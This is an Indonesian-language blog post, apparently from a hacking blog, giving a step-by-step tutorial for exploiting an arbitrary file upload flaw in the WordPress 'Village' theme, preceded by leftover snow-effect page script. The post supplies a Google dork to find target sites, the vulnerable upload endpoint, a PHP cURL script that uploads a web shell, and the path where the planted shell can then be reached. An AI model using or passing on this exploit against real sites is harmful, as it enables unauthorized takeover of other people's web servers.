//Configure below to change URL path to the snow image var snowsrc="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjH3KsqATEn3NpKy0jpPpLjyQPJahGm2JEhV7YbS2VDKjBzdQkAzmqM_J0v8DCIwuZ-HihwYDaLN8wPuLHnrT7I5T6vONsRKKRr6w7m76FEBDRJH80u2PJM0wGpB8XkanXYJOatVGmF0l0/s400/snow.gif" // Configure below to change number of snow to render var no = 15; // Configure whether snow should disappear after x seconds (0=never): var hidesnowtime = 0; // Configure how much snow should drop down before fading ("windowheight" or "pageheight") var snowdistance = "pageheight"; ///////////Stop Config////////////////////////////////// var ie4up = (document.all) ? 1 : 0; var ns6up = (document.getElementById&&!document.all) ? 1 : 0; function iecompattest(){ return (document.compatMode && document.compatMode!="BackCompat")? document.documentElement : document.body } var dx, xp, yp; // coordinate and position variables var am, stx, sty; // amplitude and step variables var i, doc_width = 800, doc_height = 600; if (ns6up) { doc_width = self.innerWidth; doc_height = self.innerHeight; } else if (ie4up) { doc_width = iecompattest().clientWidth; doc_height = iecompattest().clientHeight; } dx = new Array(); xp = new Array(); yp = new Array(); am = new Array(); stx = new Array(); sty = new Array(); snowsrc=(snowsrc.indexOf("dynamicdrive.com")!=-1)? "https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjH3KsqATEn3NpKy0jpPpLjyQPJahGm2JEhV7YbS2VDKjBzdQkAzmqM_J0v8DCIwuZ-HihwYDaLN8wPuLHnrT7I5T6vONsRKKRr6w7m76FEBDRJH80u2PJM0wGpB8XkanXYJOatVGmF0l0/s400/snow.gif" : snowsrc for (i = 0; i < no; ++ i) { dx[i] = 0; // set coordinate variables xp[i] = Math.random()*(doc_width-50); // set position variables yp[i] = Math.random()*doc_height; am[i] = Math.random()*20; // set amplitude variables stx[i] = 0.02 + Math.random()/10; // set step variables sty[i] = 0.7 + Math.random(); // set step variables if (ie4up||ns6up) { if (i == 0) { document.write("

Salam Satu Komando

Salam Satu Komando

Salam Bhineika Tunggal Ika

Cari Blog Ini

Rabu, 26 Maret 2014

WordPress Village theme Arbitary File Upload

Bahan-Bahan:
-XAMPP (Serch Di Google Banyak Kok)
-Shell (Bisa Pakek Shell GCA)

Langkah-Langkah:
1).Search Di Google Gunakan Dork
inurl:/wp-content/themes/village

 2).Jika Ketemu Masukan Exploit /wp-content/themes/village/blueprint/gallery/ajaxupload/server/php.php

 3).Jika Web Vuln Akan Keluar Tulisan {"error":"No files were uploaded."}

 4).Buat File Baru Berekstensi .php Contoh lol.php Dan Simpan Script Berikut Di Directory C:/XAMPP/php Masukan Script Berikut Edit-Edit Dikit :D

<?php

$uploadfile="shell.php"; 
$ch =
curl_init("http://site/wp-content/themes/village/blueprint/gallery/ajaxupload/server/php.php");
curl_setopt($ch, CURLOPT_POST, true); 
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('qqfile'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";


?>

5).Masukan Shell Ente Juga Jadi Ada Dua File Di Directory C:/XAMPP/php yaitu Shell Dan Script Tadi :D



5).Aktifkan XAMPP Klik Start Pada Apache


6).Buka cmd Dengan Cara Klik Start -> Run -> Ketik "cmd"
7).Ketik cd\xampp/php

8)ketik php namascript.php Contoh: php lol.php
9).Jika Succes Akan Seperti Gambar Seperti Ini

10).Untuk Letak Shell nanti ada di
http://ste/wp-content/themes/village/blueprint/gallery/ajaxupload/server/uploads/yourshell.php
Diposting oleh di

Tidak ada komentar:

Posting Komentar

Jika Ada Yang Kurang Paham, Silahkan Berkomentar Dengan Sopan & Dapat Di Mengerti..

Langganan: Posting Komentar (Atom)